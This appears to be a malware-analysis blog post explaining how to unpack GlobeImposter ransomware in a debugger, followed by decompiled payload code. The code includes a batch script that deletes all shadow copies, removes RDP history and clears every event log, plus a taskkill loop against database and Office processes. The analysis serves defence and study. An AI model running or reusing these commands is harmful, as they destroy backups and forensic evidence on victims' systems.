Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
ToolollyDbgCFF Explorer, IDA Pro
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

GlobeImposter ransomware utilizes a loader/patcher algorithm patching and unloading the decoded payload in memory.

GlobeImposter ransomware patches itself using CreateProcessA API setting the creation flag to CREATE_SUSPENDED and writing itself into the buffer via WriteProcessMemory API. Next, the ransomware process won’t be executed immediately; it does not start until called ResumeThread. So, the ransomware has time to patch in memory.

I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV.  Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(1) Registry persistency:

(b) GlobeImposter vssadmin & host script:
  GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
  lstrcatW(&TempFileName, L”.bat”);
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  v1 = result;
  if ( result != (HANDLE)-1 )
    v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
      “@echo off\r\n”
      “vssadmin.exe Delete Shadows /All /Quiet\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
      “reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
      “cd %userprofile%\\documents\\\r\n”
      “attrib Default.rdp -s -h\r\n”
      “del Default.rdp \r\n”
      “for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
    result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
 v18 = RSA_Encrypt_Function(

  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  v5 = lstrlenA(“rsa_encrypt”);
  if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )

      memset(&v10, 0, a3);
(d) Taskill function terminating the following processes:
  • “sql”
  • “outlook”
  • “ssms”
  • “postgre”
  • “1c”
  • “excel”
  • “word”
 memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;
  result = CreateToolhelp32Snapshot(2u, 0);
  v2 = result;
  if ( result != (HANDLE)-1 )
    pe.dwSize = 556;
    Process32FirstW(result, &pe);
      v3 = (LPCSTR *)off_41B950;
      while ( 1 )
        v4 = sub_4128DF(pe.szExeFile, 0);
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        if ( StrStrA(v4, *v3) )
        if ( (signed int)v3 >= (signed int)&unk_41B96C )
          goto LABEL_10;
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, “%d”, pe.th32ProcessID);
      lstrcpyA(&String1, “taskkill /F /T /PID “);
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  return result;
(d) Targeted exclusion extensions and README extortion message in Olly:

3 thoughts on “Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s